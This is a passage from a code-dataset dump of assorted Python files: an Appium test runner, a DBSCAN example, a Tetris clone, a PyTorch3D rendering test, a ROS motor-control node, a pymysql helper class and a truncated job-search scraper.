os.makedirs(screen_path)\n common.IMAGE_PATH = screen_path\n\n # On Unix-like systems, append \"/\" to show the full screenshot path\n screen_linux_path = screen_path + \"/\"\n \n # Start appium\n appium = AppiumServer()\n appium.start_server()\n time.sleep(5)\n\n # Initialize the test suite\n suite = unittest.TestSuite()\n discover = unittest.defaultTestLoader.discover(\n case_path, pattern=\"test_*.py\", top_level_dir=None)\n for d in discover:\n suite.addTest(d)\n\n # Start running the tests\n runner = HtmlTestRunner.HTMLTestRunner(output=now, screen_path=screen_linux_path, report_title=\"Android Contestia Test Report\")\n runner.run(suite)\n\n # Stop appium\n appium.stop_server()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"290649927","text":"import numpy as np\nfrom sklearn.cluster import DBSCAN\nimport matplotlib.pyplot as plt\nfrom sklearn.datasets import make_blobs  # sklearn.datasets.samples_generator is deprecated\nfrom sklearn.preprocessing import StandardScaler\n\n# load the data set\n# #############################################################################\n# Generate sample data\ncenters = [[1, 1], [-1, -1], [1, -1]]\nX, labels_true = make_blobs(n_samples=750, centers=centers, cluster_std=0.4,\n
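 # fixed random_state so the generated sample blobs are reproducible\n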
 random_state=0)\n\nX = StandardScaler().fit_transform(X)\ndb = DBSCAN(eps=0.3, min_samples=10).fit(X)\n\n# (excerpt from https://scikit-learn.org/stable/auto_examples/cluster/plot_dbscan.html\n# sphx-glr-auto-examples-cluster-plot-dbscan-py\n# \"mask\" is a programming term denoting a configuration of\n# truth values which is used to select elements of another\n# sequence of the same length. The False values are said to\n# \"mask\" the corresponding elements of the second sequence,\n# the True values \"unmask\" the corresponding elements\ncore_samples_mask = np.zeros_like(db.labels_, dtype=bool)\ncore_samples_mask[db.core_sample_indices_] = True\nlabels = db.labels_\nn_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)\n\n\nplt.plot(X[:, 0], X[:, 1], 'ko')\nplt.show()\n\nunique_labels = set(labels)\ncolors = [plt.cm.Spectral(each)\n for each in np.linspace(0, 1, len(unique_labels))]\nfor k, col in zip(unique_labels, colors):\n if k == -1:\n # Black used for noise.\n col = [0, 0, 0, 1]\n\n class_member_mask = (labels == k)\n\n xy = X[class_member_mask & core_samples_mask]  # the samples live in X ('data' was undefined)\n plt.plot(xy[:, 0], xy[:, 1], 'o', markerfacecolor=tuple(col),\n markeredgecolor='k', markersize=4)\n\n xy = X[class_member_mask & ~core_samples_mask]\n plt.plot(xy[:, 0], xy[:, 1], 'o', markerfacecolor=tuple(col),\n markeredgecolor='k', markersize=2)\n\nplt.title('Estimated number of clusters: %d' % n_clusters_)\nplt.show()\n\n","sub_path":"1/dbscan_exp.py","file_name":"dbscan_exp.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"367078338","text":"from woocommerce import API\nimport credentials as cd\n\nwcapi = API(\n url=\"https://minimeis.com\",\n consumer_key=cd.api_key,\n consumer_secret=cd.user_secret,\n version=cd.version\n)\nprint(cd.api_key)\nresp = wcapi.get('products')\nprint(resp.status_code)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"567486621","text":"# -*- coding:utf-8 -*-\n\nimport ctypes\nimport time\nimport os,sys\n\nsys.path.append(os.path.join(os.path.split(os.path.dirname(os.path.abspath(__file__)))[0], 'config'))\nfrom common import *\nos.putenv('path', os.environ['path'] + ';' + DLL_PATH)\n\n\nclass SEVB0027(object):\n def __init__(self, path):\n self.handle = 0\n self.dll = ctypes.cdll.LoadLibrary(path)\n\n def sevb27_4001_init(self, sn):\n p_handle = ctypes.pointer(ctypes.c_int())\n try:\n sn = sn.split('\"')[1]\n sn = sn.encode(\"utf-8\")\n except:\n sn = sn.encode(\"utf-8\")\n error = self.dll.SEVB0027_4001_Init(p_handle, sn)\n if 0 == error:\n self.handle = p_handle.contents.value\n return error\n\n def sevb27_4001_setchannel(self, channel):\n return self.dll.SEVB0027_4001_SetChannel(self.handle, ctypes.c_int(channel))\n\n\nif __name__ == '__main__':\n clock = SEVB0027(DLL_PATH+ '\\\\SEVB0027_4001.dll')\n if clock.sevb27_4001_init(\"SEVB270113071894\"):\n print('no')\n while True:\n if clock.sevb27_4001_setchannel(2):\n print('no')\n time.sleep(1)\n if clock.sevb27_4001_setchannel(4):\n print('no')\n time.sleep(1)\n","sub_path":"ATE_unittest/TestTool_File/sevb0027.py","file_name":"sevb0027.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"115882271","text":"import subprocess\nimport os\n\npath = 'data/'\njsons = [jsonfile for jsonfile in
 os.listdir(path) if jsonfile.endswith('.json')]\n\nfor jsonfile in jsons:\n\toutfile = jsonfile.split('.json')[0] + '_cleaned.json'\n\t# list-form arguments bypass the shell, so \"|\" and \">\" were being passed to\n\t# cat literally; run the jq pipeline through a shell and include the data/ path\n\tsubprocess.check_output(\"cat \" + path + jsonfile + \" | jq -c '.' > \" + path + outfile, shell=True)\n\t\n\n","sub_path":"clean_json.py","file_name":"clean_json.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"644035430","text":"# Import a library of functions called 'pygame'\nimport pygame\nimport time\n# Import the Gameboard class\nfrom GameBoard import GameBoard\nfrom GameBoard import gameboardheight\n# Import the Shape class\nfrom Shape import Shape\nfrom BottomShape import BottomShape\n\n# Define some colours RGB\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nGREEN = (0, 255, 0)\nRED = (255, 0, 0)\nBLUE = (0, 0, 255)\nYELLOW = (255,255,0)\nMAGENTA = (255,0,255)\nTURQUOISE = (0,206,209)\n\n\nif __name__ == \"__main__\":\n # Initialize the game engine\n pygame.init()\n # Engine used for sounds\n pygame.mixer.init()\n #sets the screen size to 800 pixel width and 600 pixel height\n size = (800, 600)\n # our first shape\n shape = Shape()\n bottomshape = BottomShape(shape.shapeNum)\n # the next shape\n nextshape = Shape()\n # our game board\n gameboard = GameBoard(WHITE, shape.blockList[0].size)\n slowtimedelay = 0\n myfont = pygame.font.Font('freesansbold.ttf', 30)\n HSfont = pygame.font.Font('freesansbold.ttf', 20)\n namelist = [0 for y in range(5)]\n scorelist = [0 for y in range(5)]\n HSfile = open(\"HighScores.txt\", \"r\") # opens the text file HighScores\n for i in range(5):\n namelist[i] = HSfile.readline().rstrip('\\n') # reads in the name minus the blank line\n for i in range(5):\n scorelist[i] = HSfile.readline().rstrip('\\n') # reads in the score minus the blank line\n HSfile.close() # closes the text file HighScores\n # loop control variable that will become true and close the program when we click the X\n screen = pygame.display.set_mode(size)\n pygame.display.set_caption(\"Tetris Clone - By Scott King\")\n # used for delaying the timer. 
Initialized to 0\n delay = 0\n pygame.mixer.music.load('RoyaltyFreeBGM.mp3')\n pygame.mixer.music.play(-1) # we use -1 to make it loop\n name = \"\" # used for storing the player's name by default it is empty\n # Loop until the user clicks the close button.\n exitGame = False\n gameStarted = False\n\ndef keyCheck():\n if event.key == pygame.K_LEFT:\n shape.moveLeft()\n elif event.key == pygame.K_RIGHT:\n shape.moveRight()\n elif event.key == pygame.K_d:\n shape.moveDown()\n elif event.key == pygame.K_UP:\n shape.rotateCW()\n elif event.key == pygame.K_DOWN:\n shape.rotateCCW()\n elif event.key == pygame.K_SPACE:\n #increase score based on how far it is dropped\n gameboard.score += (gameboardheight - shape.blockList[0].gridYpos)\n shape.drop()\n elif event.key == pygame.K_t and gameboard.numslowtime > 0:\n gameboard.numslowtime -= 1\n gameboard.slowtimeon = True\n elif event.key == pygame.K_s and gameboard.numswap > 0:\n gameboard.numswap -= 1\n gameboard.swapshape = True\n\n\ndef drawScreen():\n screen.fill(BLACK) # fills the screen with the specified colour\n # draw a shape to the screen\n shape.draw(screen)\n bottomshape.draw(screen)\n # draw the next shape to the screen\n nextshape.drawnextshape(screen)\n # draw the game board to the screen\n gameboard.draw(screen)\n #displays the score to the screen\n scoretext = myfont.render(\"Score: \" + str(gameboard.score), 1, WHITE)\n screen.blit(scoretext, (400, 400))\n # display the number of lines\n numcompletelinestext = myfont.render(\"Lines: \" + str(gameboard.numlines), 1, WHITE)\n screen.blit(numcompletelinestext, (400, 350))\n # display the level\n leveltext = myfont.render(\"Level: \" + str(gameboard.level), 1, WHITE)\n screen.blit(leveltext, (400, 300))\n # Display the next shape\n nextshapetext = myfont.render(\"Next: \", 1, WHITE)\n screen.blit(nextshapetext, (400, 50))\n # Display Power ups\n poweruptext = myfont.render(\"Power Ups: \", 1, WHITE)\n screen.blit(poweruptext, (50, 525))\n # Display number of slow time power ups available\n numslowtimetext = myfont.render(\" x\" + str(gameboard.numslowtime), 1, WHITE)\n screen.blit(numslowtimetext, (310, 525))\n slowtime_image = pygame.image.load(\"clock.png\")\n # Display number of swap shape power ups available\n numswaptext = myfont.render(\" x\" + str(gameboard.numswap), 1, WHITE)\n screen.blit(numswaptext, (435, 525))\n swap_image = pygame.image.load(\"swap.png\")\n screen.blit(swap_image, (375, 515))\n screen.blit(slowtime_image, (250, 515))\n pygame.draw.rect(screen, WHITE, [400, 100, 6 * shape.blockList[0].size, 6 * shape.blockList[0].size], 1)\n # Display the name\n playernametext = myfont.render(\"Player: \" + name, 1, WHITE)\n screen.blit(playernametext, (515, 525))\n # Display the high scores\n highscoretext = myfont.render(\"High Scores\", 1, WHITE)\n screen.blit(highscoretext, (575, 50))\n for i in range(5):\n hsnametext = HSfont.render(str(namelist[i]), 1, WHITE)\n hsscoretext = HSfont.render(str(scorelist[i]), 1, WHITE)\n screen.blit(hsnametext, (580, i * 25 + 125))\n screen.blit(hsscoretext, (700, i * 25 + 125))\n pygame.draw.rect(screen, WHITE, [575, 100, 200, 400], 1)\n pygame.display.flip() # updates the screen with everything we've drawn\n\ndef checkHighScores():\n newhighscore = False\n tempnamelist = [0 for y in range(5)]\n tempscorelist = [0 for y in range(5)]\n for i in range(5):\n if gameboard.score > int(scorelist[i]) and newhighscore == False:\n newhighscore = True\n tempscorelist[i] = gameboard.score\n tempnamelist[i] = name\n elif newhighscore == True:\n 
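# a new high score was inserted above this slot, so shift the remaining entries down by one\n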
tempscorelist[i] = scorelist[i-1]\n tempnamelist[i] = namelist[i-1]\n else:\n tempscorelist[i] = scorelist[i]\n tempnamelist[i] = namelist[i]\n\n for i in range(5):\n scorelist[i] = tempscorelist[i]\n namelist[i] = tempnamelist[i]\n\n HSfile = open(\"HighScores.txt\", \"w\")\n for i in range(5):\n HSfile.write(namelist[i] + '\\n')\n\n for i in range(5):\n HSfile.write(str(scorelist[i]) + '\\n')\n HSfile.close()\n\n\n\n#-------- Title Screen ---------------\nwhile not gameStarted:\n titlescreen = pygame.image.load(\"Backdrop.png\")\n enterednametext = myfont.render(\"Please Type in Your Name:\", 1, WHITE)\n nametext = myfont.render(name, 1, WHITE)\n screen.blit(enterednametext, (200, 200))\n screen.blit(nametext, (300, 250))\n pygame.display.flip()\n screen.blit(titlescreen, (0, 0))\n\n # --- Main event loop\n for event in pygame.event.get(): # User did something\n if event.type == pygame.QUIT: # If user clicked close\n exitGame = True # Flag that we are done so we exit this loop\n gameStarted = True\n if event.type == pygame.KEYDOWN:\n if event.key >= 33 and event.key <= 126 and len(name) < 10:\n name = name + chr(event.key) # adds another character to the name\n if event.key == pygame.K_BACKSPACE: # removes the last character in the name\n name = name[:-1]\n if event.key == pygame.K_RETURN:\n if name == \"\": # if it's blank set it to Player1\n name = \"Player1\"\n gameStarted = True # start the game\n\n# -------- Main Program Loop -----------\nwhile not exitGame:\n# --- Main event loop\n for event in pygame.event.get(): #user did something\n if event.type == pygame.QUIT: #If user clicked close\n exitGame = True # Flag that we are done so we exit this loop\n elif event.type == pygame.KEYDOWN: # User pressed a key down\n keyCheck()\n\n bottomshape.update(shape)\n # increase delay timer\n delay += 1\n if delay >= 10: # if 10 ticks have passed, make the shape fall\n shape.falling()\n delay = 0 # reset the delay counter\n\n # if our slow time is on then count until 50 ticks have gone by and turn off slow time\n if gameboard.slowtimeon:\n slowtimedelay += 1\n if slowtimedelay > 50:\n slowtimedelay = 0\n gameboard.slowtimeon = False\n\n # this swaps the shape if we have the power up and it's being used\n if gameboard.swapshape:\n shape = nextshape\n bottomshape = BottomShape(shape.shapeNum)\n nextshape = Shape()\n gameboard.swapshape = False\n\n# if our shape has finished moving get us a new shape\n if shape.active == False:\n gameboard.clearFullRows()\n shape = nextshape\n bottomshape = BottomShape(shape.shapeNum)\n nextshape = Shape()\n\n # checks to see if we've lost or not and then resets if we have\n if gameboard.checkloss():\n checkHighScores()\n gameboard = GameBoard(WHITE, shape.blockList[0].size)\n shape = Shape()\n delay = 0\n slowtimedelay = 0\n bottomshape = BottomShape(shape.shapeNum)\n nextshape = Shape()\n\n #draws everything to thes screen\n drawScreen()\n # puts in a one tenth of second delay giving the user time to react, faster based on the level we are on\n if (0.11 - gameboard.level * 0.01 >= 0):\n time.sleep(0.11 - gameboard.level * 0.01 + gameboard.slowtimeon * 0.1)\n\n","sub_path":"TetrisClone_ScottKing.py","file_name":"TetrisClone_ScottKing.py","file_ext":"py","file_size_in_byte":9033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"83191388","text":"# Estimate camera pose demo\n# From: 
https://github.com/facebookresearch/pytorch3d/blob/master/docs/tutorials/camera_position_optimization_with_differentiable_rendering.ipynb\n\nimport os\nimport torch\nimport numpy as np\nimport imageio\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport matplotlib.pyplot as plt\n\n# io utils\nfrom pytorch3d.io import load_obj\n\n# datastructures\nfrom pytorch3d.structures import Meshes\nfrom pytorch3d.renderer.mesh.textures import TexturesVertex\n\n# 3D transformations functions\nfrom pytorch3d.transforms import Rotate, Translate\n\n# rendering components\nfrom pytorch3d.renderer import (\n OpenGLPerspectiveCameras, look_at_view_transform, look_at_rotation,\n RasterizationSettings, MeshRenderer, MeshRasterizer, BlendParams,\n SoftSilhouetteShader, SoftPhongShader, HardPhongShader, PointLights\n)\n\n\ndef prepareRenderer(sigma_, gamma_, blur_radius_, faces_per_pixel_, device):\n blend_params = BlendParams(sigma=sigma_, gamma=gamma_)\n\n raster_settings = RasterizationSettings(\n image_size=256,\n blur_radius=np.log(1. / blur_radius_ - 1.) * blend_params.sigma,\n faces_per_pixel=faces_per_pixel_,\n bin_size=0\n )\n\n # renderer = MeshRenderer(\n # rasterizer=MeshRasterizer(\n # cameras=cameras,\n # raster_settings=raster_settings\n # ),\n # shader=SoftSilhouetteShader(blend_params=blend_params)\n # )\n lights = PointLights(device=device, location=((2.0, 2.0, -2.0),))\n renderer = MeshRenderer(\n rasterizer=MeshRasterizer(\n cameras=cameras,\n raster_settings=raster_settings\n ),\n shader=SoftPhongShader(blend_params=blend_params, device=device, lights=lights)\n )\n return renderer\n\n\n# Set the cuda device\ndevice = torch.device(\"cuda:0\")\ntorch.cuda.set_device(device)\n\n# Load the obj and ignore the textures and materials.\nverts, faces_idx, _ = load_obj(\"../data/cad-models/teapot.obj\")\n#verts, faces_idx, _ = load_obj(\"../data/ikea-mug/cad/ikea_mug_scaled_reduced_centered.obj\")\nfaces = faces_idx.verts_idx\n\n# Initialize each vertex to be white in color.\nverts_rgb = torch.ones_like(verts)[None] # (1, V, 3)\ntextures = TexturesVertex(verts_features=verts_rgb.to(device))\n\n# Create a Meshes object for the teapot. 
Here we have only one mesh in the batch.\nteapot_mesh = Meshes(\n verts=[verts.to(device)],\n faces=[faces.to(device)],\n textures=textures\n)\n\n\n# Initialize an OpenGL perspective camera.\ncameras = OpenGLPerspectiveCameras(device=device)\n\n# Select the viewpoint using spherical angles\nviewpoint = [2.5, 140.0, 10.0] # distance, elevation, azimuth, ok...\n\n# Get the position of the camera based on the spherical angles\nR, T = look_at_view_transform(viewpoint[0], viewpoint[1], viewpoint[2], device=device)\n\n\nsigma = [0.001] #[1e-3, 1e-4 ,1e-5]\ngamma = [1.0] #[1e-0, 1e-1 ,1e-2, 1e-3, 1e-4 ,1e-5, 1e-6, 1e-7, 1e-8, 1e-9, 1e-10] #[0.001] #[1e-3, 1e-4 ,1e-5]\nfaces = [100] #[1,10,20,30,40,50,60,70,80,90,100,110,120,130,140,150,160,170,180,190,200]\nradius = [1e-0, 1e-1 ,1e-2, 1e-3] #, 1e-4 ,1e-5, 1e-6, 1e-7, 1e-8, 1e-9, 1e-10]\n\nfor s in sigma:\n for g in gamma:\n for f in faces:\n for r in radius:\n print(\"S: {0}, G: {1}, F: {2}, R: {3}\".format(s,g,f,r))\n renderer = prepareRenderer(s, g, r, f, device)\n image = renderer(meshes_world=teapot_mesh, R=R, T=T)\n image = image.detach().squeeze().cpu().numpy()[..., :3]\n #image = image[..., :3]\n print(image.shape)\n print(np.mean(image))\n\n fig = plt.figure(figsize=(6,6))\n plt.imshow(image)\n plt.title(\"S: {0}, G: {1}, F: {2}, R: {3}\".format(s,g,f,r))\n plt.grid(\"off\")\n plt.axis(\"off\")\n fig.tight_layout()\n fig.savefig(\"s{0}g{1}f{2}r{3}.png\".format(s,g,f,r), dpi=fig.dpi)\n plt.close()\n","sub_path":"pytorch3d/demo/parameter-test.py","file_name":"parameter-test.py","file_ext":"py","file_size_in_byte":3958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"337644396","text":"#!/usr/bin/env python\n\"\"\"Motor control ROS node\"\"\"\n\nimport time\nimport math\nimport atexit\n\nimport rospy\nfrom std_msgs.msg import Int32\n\nfrom Adafruit_MotorHAT import Adafruit_MotorHAT\n\nimport RPi.GPIO as GPIO\n\n\nNB_WHEEL_TICK = 40\nNB_ACCUMUL = 10\n\n\n\nclass MotorCtrl(object):\n \"\"\"MotorCtrl class implementing motor control\"\"\"\n def __init__(self):\n self.cm_per_sec_1 = 0\n self.cm_per_sec_2 = 0\n self.rpm_1 = 0\n self.rpm_2 = 0\n self.elapse_1 = 0\n self.elapse_2 = 0\n self.sensor_1 = 15\n self.sensor_2 = 12\n self.pulse_1 = 0\n self.pulse_2 = 0\n self.start_timer_1 = time.time()\n self.start_timer_2 = time.time()\n self.accumul_1 = 0\n self.accumul_2 = 0\n\n\n self.nb_tour = 0\n\n self.used_1 = 0\n self.used_2 = 0\n\n self.init_gpio()\n self.init_interrupt()\n self.motor_handle = Adafruit_MotorHAT(addr=0x70)\n self.motor_2 = self.motor_handle.getMotor(2)\n self.motor_1 = self.motor_handle.getMotor(1)\n self.current_speed = 0\n\n\n\n atexit.register(self.turn_off_motors)\n\n\n\n def ros_node_start(self):\n \"\"\"Init method, in charge of launching the ros node\n\tAlso subscribes to relevant topics\"\"\"\n rospy.init_node('motorCtrl', anonymous=False)\n\n #Subscription to motor control topics\n rospy.Subscriber('/motor/set_speed', Int32, self.cb_set_speed)\n rospy.Subscriber('/motor/start', Int32, self.cb_start)\n rospy.Subscriber('/motor/stop', Int32, self.cb_stop)\n rospy.Subscriber('/motor/backward', Int32, self.cb_bkwd)\n rospy.Subscriber('/motor/turn_left', Int32, self.cb_left)\n rospy.Subscriber('/motor/turn_right', Int32, self.cb_right)\n\n\n # spin() simply keeps python from exiting until this node is stopped\n rospy.spin()\n\n\n def init_interrupt(self):\n \"\"\"registers interrupt for GPIO events used in speed monitoring\"\"\"\n GPIO.add_event_detect(self.sensor_1,\n 
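 # fire the callback on both rising and falling edges of the wheel sensor\n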
GPIO.BOTH,\n callback=self.cb_calculate_elapse_1,\n bouncetime=5)\n GPIO.add_event_detect(self.sensor_2,\n GPIO.BOTH,\n callback=self.cb_calculate_elapse_2,\n bouncetime=5)\n\n # recommended for auto-disabling motors on shutdown!\n def turn_off_motors(self):\n \"\"\"Turns off motors at electrical level\"\"\"\n self.motor_handle.getMotor(1).run(Adafruit_MotorHAT.RELEASE)\n self.motor_handle.getMotor(2).run(Adafruit_MotorHAT.RELEASE)\n\n def init_gpio(self): # initialize GPIO\n \"\"\"Initialize board GPIO\"\"\"\n GPIO.setmode(GPIO.BCM)\n GPIO.setwarnings(False)\n GPIO.setup(self.sensor_1, GPIO.IN, GPIO.PUD_UP)\n GPIO.setup(self.sensor_2, GPIO.IN, GPIO.PUD_UP)\n\n\n\n def set_speed(self, speed):\n \"\"\"Method to set motor speed,\n\twith offset to compensate different spee dat same value\"\"\"\n self.motor_1.setSpeed(speed + 0)\n self.motor_2.setSpeed(speed + 9)\n\n\n def turn_left(self, speed):\n \"\"\"Turns left by reverting motor speeds\"\"\"\n self.motor_1.setSpeed(speed)\n self.motor_2.setSpeed(speed)\n self.motor_1.run(Adafruit_MotorHAT.BACKWARD)\n self.motor_2.run(Adafruit_MotorHAT.FORWARD)\n\n def turn_right(self, speed):\n \"\"\"Turns right by reverting motor speeds\"\"\"\n self.motor_1.setSpeed(speed)\n self.motor_2.setSpeed(speed)\n self.motor_1.run(Adafruit_MotorHAT.FORWARD)\n self.motor_2.run(Adafruit_MotorHAT.BACKWARD)\n\n def move_fwd(self, speed):\n \"\"\"Moves forward \"\"\"\n self.motor_1.setSpeed(speed)\n self.motor_2.setSpeed(speed)\n self.motor_1.run(Adafruit_MotorHAT.FORWARD)\n self.motor_2.run(Adafruit_MotorHAT.FORWARD)\n\n def move_bkwd(self, speed):\n \"\"\"Moves backward \"\"\"\n self.motor_1.setSpeed(speed)\n self.motor_2.setSpeed(speed)\n self.motor_1.run(Adafruit_MotorHAT.BACKWARD)\n self.motor_2.run(Adafruit_MotorHAT.BACKWARD)\n\n def move_stop(self):\n \"\"\"Stops the motors \"\"\"\n self.motor_1.setSpeed(0)\n self.motor_2.setSpeed(0)\n self.turn_off_motors()\n\n #TODO : warning : ambiguous use of speed.\n #spread across motor control node and robotCore, passing the speed.\n #Check also usages in methods above, as the set_speed methods may be useless\n #It means currently there is no offset used to calibrate speed between the two motors\n #To be fixed.\n def cb_start(self, _):\n \"\"\"Callback used upon ROS topic reception \"\"\"\n self.move_fwd(self.current_speed)\n rospy.loginfo(rospy.get_caller_id() + ' received command start')\n\n def cb_stop(self, _):\n \"\"\"Callback used upon ROS topic reception \"\"\"\n self.move_stop()\n rospy.loginfo(rospy.get_caller_id() + ' received command stops')\n\n def cb_bkwd(self, _):\n \"\"\"Callback used upon ROS topic reception \"\"\"\n self.move_bkwd(self.current_speed)\n rospy.loginfo(rospy.get_caller_id() + ' received command stops')\n\n\n def cb_left(self, _):\n \"\"\"Callback used upon ROS topic reception \"\"\"\n rospy.loginfo(rospy.get_caller_id() + ' received command left')\n self.turn_left(self.current_speed)\n\n def cb_right(self, _):\n \"\"\"Callback used upon ROS topic reception \"\"\"\n rospy.loginfo(rospy.get_caller_id() + ' received command right')\n self.turn_right(self.current_speed)\n\n def cb_set_speed(self, data):\n \"\"\"Callback used upon ROS topic reception \"\"\"\n value = data.data\n rospy.loginfo(rospy.get_caller_id() + 'received set_speed command : ' + str(value))\n self.current_speed = value\n self.set_speed(value)\n\n\n # callback function\n def cb_calculate_elapse_1(self, channel):\n \"\"\"callback function for speed sensor 1\"\"\"\n self.accumul_1 += 1\n\n if self.accumul_1 <= NB_ACCUMUL:\n 
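 # still filling the accumulation window: just count this tick\n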
self.pulse_1 += 1\n else:\n self.pulse_1 += 1\n self.accumul_1 = 0\n # elapse for every 1 wheel tick accumulated made!\n self.elapse_1 = time.time() - self.start_timer_1\n # let current time equals to start_timer\n self.start_timer_1 = time.time()\n self.used_1 = 0\n\n\n\n def cb_calculate_elapse_2(self, channel):\n \"\"\"callback function for speed sensor 2\"\"\"\n self.accumul_2 += 1\n\n\n #print pulse_2\n if self.accumul_2 < NB_ACCUMUL:\n self.pulse_2 += 1\n #print (\"skip\")\n else:\n self.pulse_2 += 1\n self.accumul_2 = 0\n # elapse for every 1 wheel tick accumulated made!\n self.elapse_2 = time.time() - self.start_timer_2\n # let current time equals to start_timer\n self.start_timer_2 = time.time()\n self.nb_tour += 1\n self.used_2 = 0\n\n\n def calculate_speed(self, r_cm):\n \"\"\"calculate speed based on sensor inputs \"\"\"\n\t#TODO : separate this sensor calculation into a dedicated class\n # calculate wheel circumference in CM\n circ_cm = (2*math.pi)*r_cm\n\n # to avoid DivisionByZero error\n if self.elapse_1 != 0:\n self.rpm_1 = (((1/self.elapse_1) * 60) / NB_WHEEL_TICK) * NB_ACCUMUL\n if self.used_1 == 0:\n # calculate CM/sec\n self.cm_per_sec_1 = circ_cm / self.elapse_1\n self.used_1 = 1\n else:\n self.cm_per_sec_1 = self.cm_per_sec_1 / 2\n\n # to avoid DivisionByZero error\n if self.elapse_2 != 0:\n self.rpm_2 = ((1/self.elapse_2 * 60) / NB_WHEEL_TICK) * NB_ACCUMUL\n if self.used_2 == 0:\n # calculate CM/sec\n self.cm_per_sec_2 = circ_cm / self.elapse_2\n self.used_2 = 1\n else:\n self.cm_per_sec_2 = self.cm_per_sec_2/2\n\n\n\n\n\n\nif __name__ == '__main__':\n my_motor_ctrl = MotorCtrl()\n my_motor_ctrl.ros_node_start()\n","sub_path":"scripts/motorCtrl.py","file_name":"motorCtrl.py","file_ext":"py","file_size_in_byte":8093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"544923445","text":"'''Given a time in -hour AM/PM format, convert it to military (24-hour) time.\n\nNote: Midnight is 12:00:00AM on a 12-hour clock, and 00:00:00 on a 24-hour clock. Noon is 12:00:00PM on a 12-hour clock, and 12:00:00 on a 24-hour clock.\n\nFunction Description\n\nComplete the timeConversion function in the editor below. 
It should return a new string representing the input time in 24 hour format.\n\ntimeConversion has the following parameter(s):\n\ns: a string representing time in hour format\nInput Format\n\nA single string containing a time in -hour clock format (i.e.: or ), where and .\n\nConstraints\n\nAll input times are valid\nOutput Format\n\nConvert and print the given time in -hour format, where .'''\n\n#!/bin/python3\n\nimport os\nimport sys\nfrom datetime import datetime\n\ndef timeConversion(input_str):\n try:\n output_str = datetime.strptime(input_str, \"%I:%M:%S%p\").strftime(\"%H:%M:%S\")\n except ValueError:\n output_str = None\n return(output_str)\n\nif __name__ == '__main__':\n f = open(os.environ['OUTPUT_PATH'], 'w')\n\n s = input()\n\n result = timeConversion(s)\n\n f.write(result + '\\n')\n\n f.close()\n","sub_path":"algo_1.py","file_name":"algo_1.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"597632192","text":"import pymysql\n\n\nclass MengSql(object):\n def __init__(self, host, user, passwd, db_name):\n self.host = host\n self.user = user\n self.passwd = passwd\n self.db_name = db_name\n\n def connet(self):\n self.db = pymysql.connect(self.host, self.user, self.passwd, self.db_name)\n self.cursor = self.db.cursor()\n\n def close(self):\n self.cursor.close()\n self.db.close()\n\n def get_one(self, sql):\n try:\n self.connet()\n self.cursor.execute(sql)\n result = self.cursor.fetchone()\n self.close()\n except Exception as e:\n result = None\n print(\"Query failed: \", e)\n return result\n\n def get_all(self, sql):\n try:\n self.connet()\n self.cursor.execute(sql)\n result = self.cursor.fetchall()\n self.close()\n except Exception as e:\n result = None\n print(\"Query failed: \", e)\n return result\n\n def __edit(self, sql):\n count = 0\n try:\n self.connet()\n count = self.cursor.execute(sql)\n self.db.commit()\n self.close()\n except Exception as e:\n print(\"Transaction commit failed: \", e)\n self.db.rollback()\n return count\n\n def insert(self, table, items):\n if not all([table, items]):\n return print('Incomplete parameters')\n base_sql = \"insert into %s({}) values({})\" % table\n key_sql = ','.join(list(items.keys()))\n values = list(items.values())\n value_sql = ''\n for value in values[0:-1]:\n if isinstance(value, int):\n value_sql += str(value) + ','\n else:\n value_sql += \"'\" + value + \"',\"\n if isinstance(values[-1], int):\n value_sql += str(values[-1])\n else:\n value_sql += \"'\" + values[-1] + \"'\"\n return self.__edit(base_sql.format(key_sql, value_sql))\n\n def find_many(self, table, fields=None, query=None):\n \"\"\"select * from user where id < 5 \"\"\"\n base_sql = \"select {} from %s \" % table\n if isinstance(fields, str):\n base_sql = base_sql.format(fields)\n elif fields and hasattr(fields, '__iter__'):\n base_sql = base_sql.format(','.join(fields))\n else:\n base_sql = base_sql.format('*')\n if query:\n base_sql += query\n return self.get_all(base_sql)\n\n def update(self, table, set_sql, condition):\n \"\"\" update users set username='xiaomaoyu' where id=3 \"\"\"\n return self.__edit(\"update {} set {} where {}\".format(table, set_sql, condition))\n\n def delete(self, table, condition):\n \"\"\" delete from users where id > 999 \"\"\"\n return self.__edit(\"delete from {} where {}\".format(table, 
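 # note: the caller-supplied condition is interpolated into the SQL as-is (no escaping)\n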
condition))","sub_path":"super/db_tools/meng_sql.py","file_name":"meng_sql.py","file_ext":"py","file_size_in_byte":2858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"277433225","text":"from bs4 import BeautifulSoup\nfrom urllib.request import urlopen\nfrom urllib.parse import urlencode\nfrom tqdm import tqdm\nimport nltk\nfrom nltk.corpus import stopwords\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport matplotlib.pyplot as plt\nfrom wordcloud import WordCloud\nimport sys, re, string, datetime\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--term\", help=\"searchterm\")\nparser.add_argument(\"--l\", help=\"location\")\nparser.add_argument(\"--type\", help=\"search type q=keyword search | as_ttl=title \" ,default=\"q\")\nparser.add_argument(\"--pages\", help=\"number of pages\", default=\"3\")\n\nargs = parser.parse_args()\n\n\nif 